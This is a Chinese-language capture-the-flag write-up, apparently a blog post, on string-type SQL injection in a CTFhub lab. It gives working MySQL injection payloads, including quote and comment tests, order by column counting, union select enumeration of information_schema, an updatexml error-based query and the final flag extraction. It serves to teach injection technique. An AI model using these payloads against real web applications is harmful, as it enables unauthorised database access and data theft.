CTFhub 字符型注入

字符型注入:

需要了解mysql的知识点:

union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符

和一些基本sql语法
和一些基本注释:
#,–空格,/* */

首先开启题目,知道这一题字符型注入,
所以存在引号,
于是利用引号和注释:
1’
1’ and 1=1#
1 and 1=2#
去测试是否有sql漏洞
得到:

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
发现1’ 报错
和 1 and 1=1,回显
而1 and 1=2,没有回显
得出结论,执行了逻辑语句and ,所以有sql漏洞

所以构造语句,查看字段:
1’ order by 1#
1’ order by 2#
1’ order by 3#

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到3没有回显,所以只有两个字段

于是构造语句:
520’ union select 1,2#

在这里插入图片描述
发现有两个字段可以执行,于是构造语句
查看当前数据库:
520’ union select 1,database()#

在这里插入图片描述
在查看数据库内容:

520’ union select 1,group_concat(table_name) from
information_schema.tables where table_schema=‘sqli’ limit 1#

在这里插入图片描述
得到表flag ,查看表flag的字段:
520’ union select 1,group_concat(column_name) from
information_schema.columns where table_schema=‘sqli’
and table_name=‘flag’ limit 1#

在这里插入图片描述
得到字段,于是查看字段内容:

520’ union select 1,group_concat(flag) from sqli.flag limit 1#

在这里插入图片描述得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值